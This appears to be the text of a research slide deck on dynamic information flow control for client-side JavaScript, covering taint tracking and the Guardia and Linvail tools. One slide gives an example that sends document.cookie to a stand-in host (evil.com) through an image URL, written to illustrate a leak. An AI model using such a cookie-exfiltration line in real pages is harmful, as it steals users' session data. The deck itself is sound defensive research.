Practical Information Flow Control for Client-Side Web Applications Angel Luis Scull Pupo, Jens Nicolay, Elisa Gonzalez Boix {ascullpu, jens.nicolay, egonzale}@vub.be 1 

Web applications today Browser 0 0 0 Search Advertising Social Networking Markup Frameworks Template Engines Password Strength Checkers Application server 2 

Browser security mechanisms Same-Origin-Policy It is a security mechanism for isolating potentially malicious resources. 3 Browser 0 0 0 Search • Content from different origins have limited interaction. • Not suitable for context-sensitive components. • Not suitable for tight integration of third party services. 

JavaScript inclusion is all or nothing … … Password Strength Checker example We need to share sensitive information but prevent its leaking 4 

IFC to the Rescue 

Information Flow Policies Goal: Confidentiality Secret data cannot flow to public sinks. let leak = document.cookie; … … … let img = document.createElement(‘img’); … … img.setSrc(“http://evil.com?q=”+leak); 6 • Soundness • Transparency • Permissiveness (precision) Evaluation Metrics 

Types of Information Flow Implicit Explicit let password = document.getElementById(“pass”).value; let dummy = password.substring(4); console.log(dummy); let secret = 12 let public = 5 if(secret){ public = 4; } console.log(public); The attacker can learn one bit of the secret 7 

Approaches for IFC in JavaScript Static Analysis • No runtime overhead. • Can explore all paths of the execution. • Has access to approximate values of the execution. • JavaScript dynamic code evaluation is a challenge. • Aliasing of objects is a challenge. 8 

Approaches for IFC in JavaScript Dynamic Analysis • Has access to exact runtime values. • Can handle dynamic code evaluation. • Aliasing does not represent a problem. • Has an impact on performance of the system. • Has access to one path of the execution. 9 

Dynamic IFC Approaches Title Approach Granularity Language Implementation LeGuernic 2007 Automata Fine Sequential - SME 2010* Parallel Executions Fine Any (JavaScript) Interpreter IFC for Core JS 2012 Dyn. Type System Fine JavaScript Op. Semantics JSFlow 2014 Dynamic Fine JavaScript Interpreter COWL 2014 Dynamic Coarse JavaScript Interpreter Value-sensitive Hybrid IFC 15’ Dynamic + Static Fine JavaScript Op. Semantics Inlined IFC Monitor 15’ 16’ Dynamic + Static Fine JavaScript Instrumented 

Dynamic IFC without VM modification 

Characteristics of Guardia • Internal DSL. • Declarative. • Specification decoupled from enforcement. • No interpreter modification. G.installPolicy({ whenRead: [G.Not(G.And(G.Allow([‘createElement']), G.ParamAt(equals, G.getVType(0, String), 'iframe')))] }).on(document) 

IFC in Guardia Goals • Purely dynamic analysis IFC. • Support for explicit and implicit IFC. • Portable across different browsers. 

Dynamic IFC in Guardia Explicit flows Associate a security label with each object Implicit flows Associate a security label with the PC(context) • No Sensitive Upgrade (NSU) • Permissive Upgrade (PU) let a = 6; let c = a/2; let a = 6; let b = true; if(b){ a = 9; } 14 

Enforcement 15 

Explicit IFC tracking Taint analysis technique is used to handle explicit IFC … var age = document.getElementById(“age").value; var res = age / group; … console.log(group); … console.log(res); … Taint Track Enforce We need means to track tainted data Adds a taint flag to program values 16 

Handling implicit flows Permissive Upgrade Approach [1] T. H. Austin and C. Flanagan, “Permissive dynamic information flow analysis.,” PLAS, pp. 1–12, 2010. L ⊆ H ⊆ P PU introduces a partially leaked data label 17 

Dynamic taint analysis using code instrumentation Linvail as instrumentation platform • Provides a transparent analysis layer. • Allows tagging runtime values regardless of their types. - 2, true, ‘Hello World’ - {name : “John”} • Provides life-long value tracking. get set apply Harmony proxy var y = Math.sqrt(x); var str = JSON.stringify(obj); composite data External World 18 Internal World 

Taint analysis with Linvail var age = document.getElementById(“age").value; var res = age / 20; console.log(res); Linvail _meta_.__global__=_meta_.__global__||(function () { return this } ());_meta_.__eval__=_meta_.__eval__||eval;_meta_.__apply__=_meta_.__apply__|| (typeof Reflect === 'object' ? Reflect.apply : function(f,t,xs){return f.apply(t,xs)});_meta_.__defineProperty__=_meta_.__defineProperty__|| Object.defineProperty;_meta_.primitive(void 0,1);var taintedVal;(taintedVal=_meta_.apply(_meta_taint,null,[_meta_.primitive(42,5)],3));;var res; (res=_meta_.binary("*",taintedVal,_meta_.primitive(7,9),7));;_meta_.apply(_meta_.get((_meta_1=console),_meta_.primitive("log",11),11),_meta_1, [res],11); function enter(val, idx, ctx) { if (isprimitive(val)) { val = { inner: val }; wrappers.add(val); pointers.set(val, ++counter); return val; } return val; } function leave(val, idx, ctx) { return wrappers.has(val) ? val.inner : val; } var linvail = Linvail(enter, leave); global._meta_ = {}; }) IFC ANALYSIS + INSTRUMENTED 19 

Taint analysis with Linvail Linvail is used as a library and allows to intercept language operations let global = { binary: function (o, l, r, i) { let res = linvail["binary"](o, l, r, i); res.taint = l.taint || r.taint; return res; }, set: function (o, k, v, i) { let res = linvail["set"](o, k, v, i); res.taint = v.taint; return res; }, apply: function (fn, ths, args, i) { if (isSink(fn) && isTainted(args))) { throw new Error('IFC violation!’); }else{ return linvail[“apply”](fn, ths, args, i); } } } Base program operations Meta program analysis 20 

Challenges • Handle the DOM API - We cannot instrument the DOM. - Function annotation is not possible cause DOM is stateful. • Dynamic Objects - Structure and existence of properties. • Exceptions - Exceptions can be used to change the flow of the execution and learn a bit of information. • Higher-order functions - Functions can leak information if they are created in sensitive contexts. • Prototype chain - The prototype chain of object can be used to encode and leak information. 21 

Evaluation • We are performing evaluation using language challenges presented before. • Evaluation of performance, transparency and permissiveness is ongoing work. 22 

Conclusions • It is possible to enforce IFC policies without runtime modifications. • Remains unclear how to protect the instrumented program from attacks. 23